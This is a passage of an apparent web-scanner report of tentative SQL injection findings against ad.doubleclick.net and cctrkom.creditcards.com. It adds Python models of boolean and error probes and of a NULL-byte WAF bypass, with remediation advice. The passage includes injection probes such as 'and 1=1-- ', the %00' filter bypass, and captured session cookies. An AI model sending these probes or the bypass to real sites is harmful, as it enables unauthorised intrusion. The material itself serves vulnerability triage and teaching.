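    """Ignores its input and rotates creatives on every call, as an ad server
    does; every pair of consecutive responses differs regardless of payload."""
    return next(_rotation)


def _response(fetch: Callable[[str], str], value: str) -> str:
    """Run one request; a database error becomes part of the 'response body'
    the way a generic error page would over HTTP."""
    try:
        return fetch(value)
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)


def differential_probe(fetch: Callable[[str], str], baseline: str) -> Dict[str, str]:
    """Boolean-difference test as in 1.1: 'and 1=1' versus 'and 1=2' appended
    to a baseline value. The baseline is requested twice first; if identical
    requests already yield different responses, the comparison says nothing
    about SQL and is reported as inconclusive rather than as a finding."""
    if _response(fetch, baseline) != _response(fetch, baseline):
        return {"verdict": "inconclusive", "reason": "baseline is nondeterministic"}
    true_resp = _response(fetch, baseline + "' and 1=1-- ")
    false_resp = _response(fetch, baseline + "' and 1=2-- ")
    if true_resp != false_resp:
        return {"verdict": "suspect", "reason": "1=1 and 1=2 responses differ"}
    return {"verdict": "clean", "reason": "responses identical"}


def error_probe(fetch: Callable[[str], str], baseline: str) -> bool:
    """Error-based test as in 1.2: one quote should raise a syntax error that
    two quotes (an escaped literal quote inside the string) make disappear."""
    one = _response(fetch, baseline + "'")
    two = _response(fetch, baseline + "''")
    return one.startswith("ERROR") and not two.startswith("ERROR")


if __name__ == "__main__":
    for name, fn in [("vulnerable", lookup_vulnerable),
                     ("parameterised", lookup_parameterised),
                     ("rotating", lookup_rotating)]:
        print(name, differential_probe(fn, "300x250"), error_probe(fn, "300x250"))
```

Against the concatenated query both probes fire: the 1=1 request returns the creative and the 1=2 request returns nothing, and a lone quote raises a parse error that the doubled quote removes. Against the bound parameter every payload is just an unknown slot value, so both probes come back negative. The rotating responder is the case to remember when triaging a Tentative finding: it is reported inconclusive because the baseline itself is unstable, which is the check to run by hand before accepting any difference-based result.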

Request 1

GET /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247910801&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 602
Date: Thu, 16 Jun 2011 18:12:38 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/c/b4/%2a/n;223454979;0-0;0;56063734;4307-300/250;39046206/39063963/3;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=http%3a%2f%2fwww.fool.com/fool/free-report/15/rb-billgates-displayexternal-68077.aspx%3Faid%3D3776%26logvisit%3Dy%26source%3Derbatrbox0860010"><img src="http://s0.2mdn.net/viewad/1452306/1-15_DeathPCVideoOPWSJ_300x250.gif" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247910801&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 614
Date: Thu, 16 Jun 2011 18:12:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/c/b4/%2a/b;223454979;3-0;0;56063734;4307-300/250;42129357/42147144/2;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=http%3a%2f%2fwww.fool.com/fool/free-report/15/rb-ultimatewireless-displayexternal-107046.aspx%3Faid%3D4062%26logvisit%3Dy%26source%3Derbatrbox0860012"><img src="http://s0.2mdn.net/viewad/1452306/1-15_iPhone5IsCome_BlackHL_300x250.gif" border=0 alt="Advertisement"></a>');

1.2. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s92218100172467 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s92218100172467

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
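The NULL-byte bypass described in the remediation detail, as an added example that is not the scanner's code or any WAF vendor's. The first filter models the native-code behaviour the text refers to: it URL-decodes the path segment into a buffer and scans it with strstr()-style logic, which stops at the first NUL, so the quote in ccardsccdc-us%00' (the exact probe sent in Request 1 above) is never examined. The application behind it, running on a managed runtime, receives the whole decoded string including the quote. The second filter is the fix: it treats the buffer as length-delimited and rejects a NUL outright. The blocked-token list and the function names are assumptions; the filter is a model, not a reproduction of any product.

```python
from urllib.parse import unquote

# Assumed deny-list for the model filter; real WAF rules are far larger.
BLOCKED = ("'", "--", ";")


def native_style_filter(raw_segment: str) -> bool:
    """Models a C-string WAF rule. Returns True when the request is ALLOWED.
    strstr()/strchr() treat the first NUL as end-of-string, so anything after
    %00 is invisible to the scan even though it is still in the buffer."""
    decoded = unquote(raw_segment)
    visible = decoded.split("\x00", 1)[0]
    return not any(token in visible for token in BLOCKED)


def length_aware_filter(raw_segment: str) -> bool:
    """The fix on the WAF side: scan the full decoded length and refuse NUL
    bytes, which have no legitimate place in a URL path segment."""
    decoded = unquote(raw_segment)
    if "\x00" in decoded:
        return False
    return not any(token in decoded for token in BLOCKED)


def application_sees(raw_segment: str) -> str:
    """What a managed-runtime application (PHP, Java, Python) receives: the
    full decoded string, NUL and all, so the quote still reaches the query."""
    return unquote(raw_segment)


def evaluate(raw_segment: str) -> dict:
    """Summarise one probe: does the model WAF let it through, does the fixed
    WAF let it through, and does the dangerous character reach the backend?"""
    return {
        "native_filter_allows": native_style_filter(raw_segment),
        "fixed_filter_allows": length_aware_filter(raw_segment),
        "quote_reaches_app": "'" in application_sees(raw_segment),
    }


if __name__ == "__main__":
    # The two probes from 1.2 above, plus the plain quote for comparison.
    for seg in ("ccardsccdc-us'", "ccardsccdc-us%00'", "ccardsccdc-us%00''"):
        print(repr(seg), evaluate(seg))
```

The plain quote is blocked by both filters. With %00 in front of it the native-style filter allows the request while the quote still reaches the application, which is the bypass the scanner reports; the length-aware filter rejects it. As the remediation says, this only narrows the window: the query itself has to be parameterised, because the WAF is not the component that is vulnerable.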

Request 1

GET /b/ss/ccardsccdc-us%00'/1/H.17/s92218100172467?AQB=1&ndh=1&t=17/5/2011%205%3A41%3A25%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%27%26pg%3D1477%26pgpos%3D1&r=http%3A//burp/show/10&cc=USD&xact=1012011061705403763827581&purchaseID=1012011061705403763827581&events=purchase%2Cevent2&products=1477%3B22145581%27%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705403763827581&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%27%7C1&v30=1477%3A22145581%27&v31=22145581%27%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581'&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:59 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/ccardsccdc-us was not found on this server.</p>
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/ccardsccdc-us%00''/1/H.17/s92218100172467?AQB=1&ndh=1&t=17/5/2011%205%3A41%3A25%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%27%26pg%3D1477%26pgpos%3D1&r=http%3A//burp/show/10&cc=USD&xact=1012011061705403763827581&purchaseID=1012011061705403763827581&events=purchase%2Cevent2&products=1477%3B22145581%27%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705403763827581&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%27%7C1&v30=1477%3A22145581%27&v31=22145581%27%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581'&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:59:00 GMT
Server: Omniture DC/2.0.0
xserver: www619
Content-Length: 0
Content-Type: text/html


1.3. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s93293816028162

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ccardsccdc-us/1/H.17/s93293816028162?AQB=1&ndh=1&t=17/5/2011%205%3A39%3A33%205%20300&ns=creditcardscom&pageName=home&g=http%3A//www.creditcards.com/&cc=USD&ch=home&v0=999-0-0-0&c1=home&c9=5%3A30AM&c10=Friday&c11=Weekday&v14=999-0-0-0&v15=5%3A30AM&v16=Friday&v17=Weekday&v28=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307173398%27%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:51:39 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ccardsccdc-us/1/H.17/s93293816028162 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ccardsccdc-us/1/H.17/s93293816028162?AQB=1&ndh=1&t=17/5/2011%205%3A39%3A33%205%20300&ns=creditcardscom&pageName=home&g=http%3A//www.creditcards.com/&cc=USD&ch=home&v0=999-0-0-0&c1=home&c9=5%3A30AM&c10=Friday&c11=Weekday&v14=999-0-0-0&v15=5%3A30AM&v16=Friday&v17=Weekday&v28=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307173398%27%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:51:39 GMT
Server: Omniture DC/2.0.0
xserver: www597
Content-Length: 0
Content-Type: text/html


1.4. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95104773896746 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s95104773896746

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/ccardsccdc-us/1/H.17/s95104773896746?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A9%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22105064%26pg%3D1477%26pgpos%3D2&cc=USD&xact=1012011061705400871194905&purchaseID=1012011061705400871194905&events=purchase%2Cevent2&products=1477%3B22105064%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400871194905&v15=5%3A30AM&c16=2&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=2&v28=lead%20confirmation&v29=1477%3A22105064%7C2&v30=1477%3A22105064&v31=22105064%7C2&v32=1477%7C2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105064&pg=1477&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 405
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/ccardsccdc-us/1/H.17/s95104773896746?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A9%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22105064%26pg%3D1477%26pgpos%3D2&cc=USD&xact=1012011061705400871194905&purchaseID=1012011061705400871194905&events=purchase%2Cevent2&products=1477%3B22105064%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400871194905&v15=5%3A30AM&c16=2&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=2&v28=lead%20confirmation&v29=1477%3A22105064%7C2&v30=1477%3A22105064&v31=22105064%7C2&v32=1477%7C2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105064&pg=1477&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
xserver: www608
Content-Length: 0
Content-Type: text/html


1.5. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95972011631820 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s95972011631820

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/ccardsccdc-us/1/H.17/s95972011631820?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A20%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22125744%26pg%3D1477%26pgpos%3D5&cc=USD&xact=1012011061705401932014371&purchaseID=1012011061705401932014371&events=purchase%2Cevent2&products=1477%3B22125744%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705401932014371&v15=5%3A30AM&c16=5&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=5&v28=lead%20confirmation&v29=1477%3A22125744%7C5&v30=1477%3A22125744&v31=22125744%7C5&v32=1477%7C5&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=1477&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 402
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/ccardsccdc-us/1/H.17/s95972011631820?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A20%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22125744%26pg%3D1477%26pgpos%3D5&cc=USD&xact=1012011061705401932014371&purchaseID=1012011061705401932014371&events=purchase%2Cevent2&products=1477%3B22125744%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705401932014371&v15=5%3A30AM&c16=5&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=5&v28=lead%20confirmation&v29=1477%3A22125744%7C5&v30=1477%3A22125744&v31=22125744%7C5&v32=1477%7C5&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=1477&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
